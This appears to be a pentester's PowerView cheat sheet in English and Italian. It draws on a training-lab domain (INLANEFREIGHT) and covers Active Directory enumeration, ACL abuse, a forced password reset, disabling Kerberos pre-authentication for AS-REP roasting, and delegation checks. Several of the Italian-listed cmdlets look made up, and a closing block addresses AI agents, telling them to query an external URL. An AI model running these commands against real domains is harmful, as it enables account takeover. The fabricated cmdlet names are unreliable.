# PowerView * | Command | Description | | ------------------------------- | ------------------------------------------------------------------------------------------ | | Export-PowerViewCSV | Append results to a CSV file | | ConvertTo-SID | Convert a User or group name to its SID value | | Get-DomainSPNTicket | Requests the Kerberos ticket for a specified Service Principal Name (SPN) account | | Domain/LDAP Functions: | | | Get-Domain | Will return the AD object for the current (or specified) domain | | Get-DomainController | Return a list of the Domain Controllers for the specified domain | | Get-DomainUser | Will return all users or specific user objects in AD | | Get-DomainComputer | Will return all computers or specific computer objects in AD | | Get-DomainGroup | Will return all groups or specific group objects in AD | | Get-DomainOU | Search for all or specific OU objects in AD | | Find-InterestingDomainAcl | Finds object ACLs in the domain with modification rights set to non-built in objects | | Get-DomainGroupMember | Will return the members of a specific domain group | | Get-DomainFileServer | Returns a list of servers likely functioning as file servers | | Get-DomainDFSShare | Returns a list of all distributed file systems for the current (or specified) domain | | GPO Functions: | | | Get-DomainGPO | Will return all GPOs or specific GPO objects in AD | | Get-DomainPolicy | Returns the default domain policy or the domain controller policy for the current domain | | Computer Enumeration Functions: | | | Get-NetLocalGroup | Enumerates local groups on the local or a remote machine | | Get-NetLocalGroupMember | Enumerates members of a specific local group | | Get-NetShare | Returns open shares on the local (or a remote) machine | | Get-NetSession | Will return session information for the local (or a remote) machine | | Test-AdminAccess | Tests if the current user has administrative access to the local (or a remote) machine | | Threaded 'Meta'-Functions: | | | Find-DomainUserLocation | Finds machines where specific users are logged in | | Find-DomainShare | Finds reachable shares on domain machines | | Find-InterestingDomainShareFile | Searches for files matching specific criteria on readable shares in the domain | | Find-LocalAdminAccess | Find machines on the local domain where the current user has local administrator access | | Domain Trust Functions: | | | Get-DomainTrust | Returns domain trusts for the current domain or a specified domain | | Get-ForestTrust | Returns all forest trusts for the current forest or a specified forest | | Get-DomainForeignUser | Enumerates users who are in groups outside of the user's domain | | Get-DomainForeignGroupMember | Enumerates groups with users outside of the group's domain and returns each foreign member | | Get-DomainTrustMapping | Will enumerate all trusts for the current domain and any others seen. | [PowerView/SharpView](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview) **Creating a List of Domain Users** ```powershell PS> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt ``` **Find Interesting ACL** ```powershell Find-InterestingDomainAcl ``` **Covert NameToSID** ```powershell PS C:\htb> $sid = Convert-NameToSid wley ``` **Using Get-DomainObjectACL** ```powershell Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} ``` **Get ActiveDirectoryRights** Permessi interessanti: * **GenericAll** - full rights to the object (add users to a group or reset user's password) * **GenericWrite** - update object's attributes (i.e logon script) * **WriteOwner** - change object owner to attacker controlled user take over the object * **WriteDACL** - modify object's ACEs and give attacker full control right over the object * **AllExtendedRights** - ability to add user to a group or reset password * **ForceChangePassword** - ability to change user's password * **Self (Self-Membership)** - ability to add yourself to a group ``` Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") } ``` **Resolving GUID** ```powershell Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} ``` **Change Password `Force-Change-Password`** ```powershell PS C:\htb> $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force PS C:\htb> cd C:\Tools\ PS C:\htb> Import-Module .\PowerView.ps1 PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose VERBOSE: [Get-PrincipalContext] Using alternate credentials VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen' VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset ``` **Get User Group Member** ```powershell PS C:\Tools> Get-NetLocalGroupMember -GroupName "Remote Management Users" ComputerName : ACADEMY-EA-MS01 GroupName : Remote Management Users MemberName : INLANEFREIGHT\forend SID : S-1-5-21-3842939050-3880317879-2865463114-5614 IsGroup : False IsDomain : UNKNOWN PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse GroupDomain : INLANEFREIGHT.LOCAL GroupName : Remote Management Users GroupDistinguishedName : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL MemberDomain : INLANEFREIGHT.LOCAL MemberName : bdavis MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL MemberObjectClass : user MemberSID : S-1-5-21-3842939050-3880317879-2865463114-1162 ``` *** **AS-REPRoasting** ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH ... ``` *** **Set DONT\_REQ\_PREAUTH with PowerView** ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName)))) VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName' ``` *** **Informazioni sull'Active Directory** * `Get-NetDomain`: Ottiene informazioni sul dominio corrente. * `Get-NetForest`: Ottiene informazioni sulla foresta corrente. * `Get-NetDomainController`: Ottiene i controller di dominio nel dominio corrente. * `Get-NetGroup`: Ottiene informazioni sui gruppi dell'Active Directory. * `Get-NetUser`: Ottiene informazioni sugli utenti dell'Active Directory. * `Get-NetComputer`: Ottiene informazioni sui computer dell'Active Directory. * `Get-NetOU`: Ottiene informazioni sulle unità organizzative dell'Active Directory. **Enumerazione** * `Get-NetGroupMember`: Ottiene i membri di un gruppo. * `Get-NetLocalGroup`: Ottiene i gruppi locali su un computer remoto. * `Get-NetLocalGroupMember`: Ottiene i membri di un gruppo locale su un computer remoto. * `Get-NetShare`: Ottiene le condivisioni di rete su un computer remoto. * `Get-NetLoggedon`: Ottiene gli utenti attualmente collegati a un computer remoto. **Esplorazione dei privilegi** * `Find-LocalAdminAccess`: Trova gli account utente che hanno accesso di amministratore locale su computer remoti. * `Find-DomainUserLocation`: Trova i computer ai quali un utente ha accesso. * `Find-InterestingDomainShareFile`: Trova file condivisi interessanti all'interno dell'Active Directory. **Esplorazione delle relazioni di trust** * `Get-NetDomainTrust`: Ottiene le relazioni di trust tra domini. * `Get-NetForestTrust`: Ottiene le relazioni di trust tra foreste. **Esecuzione remota** * `Invoke-NetCommand`: Esegue un comando in remoto su uno o più computer. **Enumerazione delle autorizzazioni** * `Get-NetFilePermissions`: Ottiene le autorizzazioni dei file su un computer remoto. * `Get-NetSharePermissions`: Ottiene le autorizzazioni delle condivisioni di rete su un computer remoto. * `Get-NetLocalGroupMapping`: Ottiene la mappatura dei gruppi locali su un computer remoto. * `Get-NetEffectivePermission`: Ottiene le autorizzazioni effettive di un utente o gruppo su una risorsa. **Enumerazione dei servizi** * `Get-NetService`: Ottiene informazioni sui servizi in esecuzione su un computer remoto. * `Get-NetLoggedon`: Ottiene gli utenti attualmente collegati a un computer remoto. **Enumerazione dei token** * `Get-NetToken`: Ottiene informazioni sui token utente e di sistema su un computer remoto. **Enumerazione delle sessioni** * `Get-NetSession`: Ottiene le sessioni di rete su un computer remoto. * `Get-NetLoggedon`: Ottiene gli utenti attualmente collegati a un computer remoto. **Enumerazione dei trust** * `Get-NetDomainTrust`: Ottiene le relazioni di trust tra domini. * `Get-NetForestTrust`: Ottiene le relazioni di trust tra foreste. **Gestione dei SID History** * `Invoke-NetUserAdd`: Aggiunge un SID a un account utente. * `Invoke-NetUserClone`: Clona un account utente, inclusi gli attributi SID History. **Gestione del dominio** * `Add-NetGroupMember`: Aggiunge un membro a un gruppo dell'Active Directory. * `Add-NetGroupUser`: Aggiunge un utente a un gruppo dell'Active Directory. * `Add-NetLocalGroupMember`: Aggiunge un membro a un gruppo locale su un computer remoto. *** ### Kerberos Delegation **User Unconstrained Delegation** ```powershell Get-NetUser | Where-Object { $_.TrustedForDelegation } ``` **Constrained Delegation** ```powershell Get-DomainComputer -TrustedToAuth ``` **FindUser With ActiveDirectoryRights (WriteDacl|GenericWrite|GenericAll)** ```powershell Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") } ``` **Retrieving Domain SID** ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-DomainSID S-1-5-21-2974783224-3764228556-2640795941 ``` *** **General Tips** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dado1513.dev/tools/powerview.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.